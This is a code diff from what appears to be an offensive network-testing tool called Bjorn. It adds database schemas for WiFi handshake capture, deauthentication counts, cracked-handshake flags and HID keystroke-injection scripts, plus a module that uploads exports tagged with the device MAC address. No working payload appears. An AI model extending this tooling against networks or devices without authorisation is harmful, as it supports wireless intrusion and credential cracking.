# Get MAC address for unique identification
try:
from ai_utils import get_system_mac
mac = get_system_mac()
except ImportError:
mac = "unknown"
logger.debug(f"Uploading {filepath.name} to AI Server ({url}) unique_id={mac}")
self._set_server_contact_state(True, None)
with open(filepath, 'rb') as f:
files = {'file': f}
# Send MAC as query param
# Server expects ?mac_addr=...
params = {'mac_addr': mac}
# Short timeout to avoid blocking
response = requests.post(f"{url}/upload", files=files, params=params, timeout=10)
if response.status_code == 200:
self._set_server_contact_state(True, True)
self._upload_backoff_until = 0.0
self._upload_backoff_current_s = 0.0
logger.success(f"Uploaded {filepath.name} successfully")
self._mark_batch_status(str(filepath), "transferred", "uploaded")
self._safe_delete_uploaded_export(filepath)
return True
else:
self._set_server_contact_state(True, False)
next_retry_s = self._apply_upload_backoff(backoff_s, max_backoff_s)
logger.debug(
f"AI upload HTTP failure for {filepath.name}: status={response.status_code}, "
f"next retry in {next_retry_s}s"
)
logger.info_throttled(
f"AI upload deferred (HTTP {response.status_code})",
key=f"ai_upload_http_{response.status_code}",
interval_s=300.0,
)
return False
except Exception as e:
self._set_server_contact_state(True, False)
next_retry_s = self._apply_upload_backoff(backoff_s, max_backoff_s)
logger.debug(f"AI upload exception for {filepath}: {e} (next retry in {next_retry_s}s)")
logger.info_throttled(
"AI upload deferred: server unreachable (retry later)",
key="ai_upload_exception",
interval_s=300.0,
)
return False
def cleanup_old_exports(self, days: int = 30):
"""Delete export files older than N days"""
try:
cutoff = datetime.now() - timedelta(days=days)
old_batches = self.db.query("""
SELECT file_path FROM ml_export_batches
WHERE created_at < ?
""", (cutoff.isoformat(),))
deleted = 0
for batch in old_batches:
filepath = Path(batch['file_path'])
if filepath.exists():
filepath.unlink()
deleted += 1
# Clean up database records
self.db.execute("""
DELETE FROM ml_export_batches
WHERE created_at < ?
""", (cutoff.isoformat(),))
logger.info(f"Cleaned up {deleted} old export files")
except Exception as e:
logger.error(f"Cleanup failed: {e}")
# ═══════════════════════════════════════════════════════════════════════════
# END OF FILE
# ═══════════════════════════════════════════════════════════════════════════

View File

@@ -26,6 +26,9 @@ from db_utils.comments import CommentOps
from db_utils.agents import AgentOps
from db_utils.studio import StudioOps
from db_utils.webenum import WebEnumOps
from db_utils.sentinel import SentinelOps
from db_utils.bifrost import BifrostOps
from db_utils.loki import LokiOps
logger = Logger(name="database.py", level=logging.DEBUG)
@@ -61,7 +64,10 @@ class BjornDatabase:
self._agents = AgentOps(self._base)
self._studio = StudioOps(self._base)
self._webenum = WebEnumOps(self._base)
self._sentinel = SentinelOps(self._base)
self._bifrost = BifrostOps(self._base)
self._loki = LokiOps(self._base)
# Ensure schema is created
self.ensure_schema()
@@ -138,7 +144,10 @@ class BjornDatabase:
self._agents.create_tables()
self._studio.create_tables()
self._webenum.create_tables()
self._sentinel.create_tables()
self._bifrost.create_tables()
self._loki.create_tables()
# Initialize stats singleton
self._stats.ensure_stats_initialized()
@@ -156,6 +165,15 @@ class BjornDatabase:
return self._config.save_config(config)
# Host operations
def get_host_by_mac(self, mac_address: str) -> Optional[Dict[str, Any]]:
"""Get a single host by MAC address"""
try:
results = self.query("SELECT * FROM hosts WHERE mac_address=? LIMIT 1", (mac_address,))
return results[0] if results else None
except Exception as e:
logger.error(f"Error getting host by MAC {mac_address}: {e}")
return None
def get_all_hosts(self) -> List[Dict[str, Any]]:
return self._hosts.get_all_hosts()
@@ -259,7 +277,27 @@ class BjornDatabase:
def get_last_action_statuses_for_mac(self, mac_address: str) -> Dict[str, Dict[str, str]]:
return self._queue.get_last_action_statuses_for_mac(mac_address)
# Circuit breaker operations
def record_circuit_breaker_failure(self, action_name: str, mac: str = '',
max_failures: int = 5, cooldown_s: int = 300) -> None:
return self._queue.record_circuit_breaker_failure(action_name, mac, max_failures, cooldown_s)
def record_circuit_breaker_success(self, action_name: str, mac: str = '') -> None:
return self._queue.record_circuit_breaker_success(action_name, mac)
def is_circuit_open(self, action_name: str, mac: str = '') -> bool:
return self._queue.is_circuit_open(action_name, mac)
def get_circuit_breaker_status(self, action_name: str, mac: str = '') -> Optional[Dict[str, Any]]:
return self._queue.get_circuit_breaker_status(action_name, mac)
def reset_circuit_breaker(self, action_name: str, mac: str = '') -> None:
return self._queue.reset_circuit_breaker(action_name, mac)
def count_running_actions(self, action_name: Optional[str] = None) -> int:
return self._queue.count_running_actions(action_name)
# Vulnerability operations
def add_vulnerability(self, mac_address: str, vuln_id: str, ip: Optional[str] = None,
hostname: Optional[str] = None, port: Optional[int] = None):
@@ -519,6 +557,21 @@ class BjornDatabase:
def vacuum(self) -> None:
"""Vacuum the database"""
return self._base.vacuum()
def close(self) -> None:
"""Close database connection gracefully."""
try:
with self._lock:
if hasattr(self, "_base") and self._base:
# DatabaseBase handles the actual connection closure
if hasattr(self._base, "_conn") and self._base._conn:
self._base._conn.close()
logger.info("BjornDatabase connection closed")
except Exception as e:
logger.debug(f"Error during database closure (ignorable if already closed): {e}")
# Removed __del__ as it can cause circular reference leaks and is not guaranteed to run.
# Lifecycle should be managed by explicit close() calls.
# Internal helper methods used by modules
def _table_exists(self, name: str) -> bool:

View File

@@ -162,7 +162,8 @@ class ActionOps:
b_rate_limit = COALESCE(excluded.b_rate_limit, actions.b_rate_limit),
b_stealth_level = COALESCE(excluded.b_stealth_level, actions.b_stealth_level),
b_risk_level = COALESCE(excluded.b_risk_level, actions.b_risk_level),
b_enabled = COALESCE(excluded.b_enabled, actions.b_enabled),
-- Keep persisted enable/disable state from DB across restarts.
b_enabled = actions.b_enabled,
b_args = COALESCE(excluded.b_args, actions.b_args),
b_name = COALESCE(excluded.b_name, actions.b_name),
b_description = COALESCE(excluded.b_description, actions.b_description),
@@ -218,8 +219,10 @@ class ActionOps:
WHERE id = 1
""", (action_count_row['cnt'],))
# Invalidate cache so callers immediately see fresh definitions
type(self).get_action_definition.cache_clear()
logger.info(f"Synchronized {len(actions)} actions")
def list_actions(self):
"""List all action definitions ordered by class name"""
return self.base.query("SELECT * FROM actions ORDER BY b_class;")
@@ -261,23 +264,6 @@ class ActionOps:
})
return out
# def list_action_cards(self) -> list[dict]:
# """Lightweight descriptor of actions for card-based UIs"""
# rows = self.base.query("""
# SELECT b_class, b_enabled
# FROM actions
# ORDER BY b_class;
# """)
# out = []
# for r in rows:
# cls = r["b_class"]
# out.append({
# "name": cls,
# "image": f"/actions/actions_icons/{cls}.png",
# "enabled": int(r.get("b_enabled", 1) or 1),
# })
# return out
@lru_cache(maxsize=32)
def get_action_definition(self, b_class: str) -> Optional[Dict[str, Any]]:
"""Cached lookup of an action definition by class name"""

116
db_utils/bifrost.py Normal file
View File

@@ -0,0 +1,116 @@
"""
Bifrost DB operations — networks, handshakes, epochs, activity, peers, plugin data.
"""
import logging
from logger import Logger
logger = Logger(name="db_utils.bifrost", level=logging.DEBUG)
class BifrostOps:
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create all Bifrost tables."""
# WiFi networks discovered by Bifrost
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_networks (
bssid TEXT PRIMARY KEY,
essid TEXT DEFAULT '',
channel INTEGER DEFAULT 0,
encryption TEXT DEFAULT '',
rssi INTEGER DEFAULT 0,
vendor TEXT DEFAULT '',
num_clients INTEGER DEFAULT 0,
first_seen TEXT DEFAULT CURRENT_TIMESTAMP,
last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
handshake INTEGER DEFAULT 0,
deauthed INTEGER DEFAULT 0,
associated INTEGER DEFAULT 0,
whitelisted INTEGER DEFAULT 0
)
""")
# Captured handshakes
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_handshakes (
id INTEGER PRIMARY KEY AUTOINCREMENT,
ap_mac TEXT NOT NULL,
sta_mac TEXT NOT NULL,
ap_essid TEXT DEFAULT '',
channel INTEGER DEFAULT 0,
rssi INTEGER DEFAULT 0,
filename TEXT DEFAULT '',
captured_at TEXT DEFAULT CURRENT_TIMESTAMP,
uploaded INTEGER DEFAULT 0,
cracked INTEGER DEFAULT 0,
UNIQUE(ap_mac, sta_mac)
)
""")
# Epoch history
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_epochs (
id INTEGER PRIMARY KEY AUTOINCREMENT,
epoch_num INTEGER NOT NULL,
started_at TEXT NOT NULL,
duration_secs REAL DEFAULT 0,
num_deauths INTEGER DEFAULT 0,
num_assocs INTEGER DEFAULT 0,
num_handshakes INTEGER DEFAULT 0,
num_hops INTEGER DEFAULT 0,
num_missed INTEGER DEFAULT 0,
num_peers INTEGER DEFAULT 0,
mood TEXT DEFAULT 'ready',
reward REAL DEFAULT 0,
cpu_load REAL DEFAULT 0,
mem_usage REAL DEFAULT 0,
temperature REAL DEFAULT 0,
meta_json TEXT DEFAULT '{}'
)
""")
# Activity log (event feed)
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_activity (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
event_type TEXT NOT NULL,
title TEXT NOT NULL,
details TEXT DEFAULT '',
meta_json TEXT DEFAULT '{}'
)
""")
self.base.execute(
"CREATE INDEX IF NOT EXISTS idx_bifrost_activity_ts "
"ON bifrost_activity(timestamp DESC)"
)
# Peers (mesh networking — Phase 2)
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_peers (
peer_id TEXT PRIMARY KEY,
name TEXT DEFAULT '',
version TEXT DEFAULT '',
face TEXT DEFAULT '',
encounters INTEGER DEFAULT 0,
last_channel INTEGER DEFAULT 0,
last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
first_seen TEXT DEFAULT CURRENT_TIMESTAMP
)
""")
# Plugin persistent state
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_plugin_data (
plugin_name TEXT NOT NULL,
key TEXT NOT NULL,
value TEXT DEFAULT '',
PRIMARY KEY (plugin_name, key)
)
""")
logger.debug("Bifrost tables created/verified")

51
db_utils/loki.py Normal file
View File

@@ -0,0 +1,51 @@
"""
Loki DB operations — HID scripts and job tracking.
"""
import logging
from logger import Logger
logger = Logger(name="db_utils.loki", level=logging.DEBUG)
class LokiOps:
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create all Loki tables."""
# User-saved HID scripts
self.base.execute("""
CREATE TABLE IF NOT EXISTS loki_scripts (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT NOT NULL UNIQUE,
description TEXT DEFAULT '',
content TEXT NOT NULL DEFAULT '',
category TEXT DEFAULT 'general',
target_os TEXT DEFAULT 'any',
created_at TEXT DEFAULT CURRENT_TIMESTAMP,
updated_at TEXT DEFAULT CURRENT_TIMESTAMP
)
""")
# Job execution history
self.base.execute("""
CREATE TABLE IF NOT EXISTS loki_jobs (
id TEXT PRIMARY KEY,
script_id INTEGER,
script_name TEXT DEFAULT '',
status TEXT DEFAULT 'pending',
output TEXT DEFAULT '',
error TEXT DEFAULT '',
started_at TEXT,
finished_at TEXT,
created_at TEXT DEFAULT CURRENT_TIMESTAMP
)
""")
self.base.execute(
"CREATE INDEX IF NOT EXISTS idx_loki_jobs_status "
"ON loki_jobs(status)"
)
logger.debug("Loki tables created/verified")

Some files were not shown because too many files have changed in this diff Show More